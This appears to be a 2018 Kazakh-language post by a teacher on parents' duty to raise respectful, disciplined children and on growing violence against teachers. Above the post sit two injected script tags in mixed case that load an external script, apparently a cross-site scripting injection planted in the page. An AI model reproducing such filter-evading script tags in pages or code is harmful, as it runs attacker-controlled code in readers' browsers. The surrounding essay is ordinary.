<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.03.2018

Бүгінгі күнде жастардың әсіресе мектеп оқушыларын жетілген, тәрбиелі, тәртіпті азамат етіп тәрбиелеу ата-ананың басты міндеті. Себебі,өмірге келген күннен бастап,баланың жан –дүниесіне жағымды-жағымсыз әрекеттер тек ата-аналардан беріледі. Бұл әрекет мектепте, қоғамдық ортада, өз жалғасын табады. Сондықтан, балалардың жақсы немесе жаман болып қалыптасуына ең бірінші отбасындағы ата-ананың немесе сол отбасындағы үлкендердің әсері аса маңызды екенін баса айтқым келеді. Бала үшін ең мәртебелі адам - оның ата-анасы. Ең әдемі, жарық үй –оның туылған үйі. Сондықтан балалар отбасының айнасы іспеттес. Балаларды жас кезінен тазалыққа, ұқыптылыққа, еңбекті сүюге, отбасы мен отанының қадір-қасиетін түсінуге тәрбиелеу керек. Қазіргі күндегі жаңалықтарды алға тарта отырып, мектептегі болып жатқан келеңсіз жағдайларды айтқым келеді. Баршамызға белгілі қазіргі кезде мұғалімнің беделін түсіріп, тіптен соққыға жығып, ауыр дене жарақатын тартып жатқан мұғалімдер саны артып бара жатыр деуге болады. Бұл әрине оңай жағдай емес, бұл атананың, мектеп оқушысының мұғалімдерді сыйлаудан қалғанын білдіреді. Соған қатты алаңдаймын.

Солай бола тура өзім істеп, сабақ беріп жүрген мектебімде ондай оқиғалар жоқ. Ата-аналарымыз бізбен дұрыс қатынас жасайды, мұғалімдерді сыйлайды, оқушылар арасында ондай келеңсіз жағдай бола қалса, ата-аналар, сынып жетекшілерімен өзара шешіп отырады.

Сондықтан, бүгінгі күнде жастарды әдепті де саналы етіп тәрбиелеу үшін, ең алдымен, тәрбие ережелеріне сүйене отырып, ұлттық дәстүрімізді, әдет-ғұрыпымызды, дінімізді балалардың бойына, санасына сіңдіре білу – ата-ананың басты міндеті дегім келеді.

Просмотров: 659


Пікір қосу



Деректерді қолтаңбаға қосу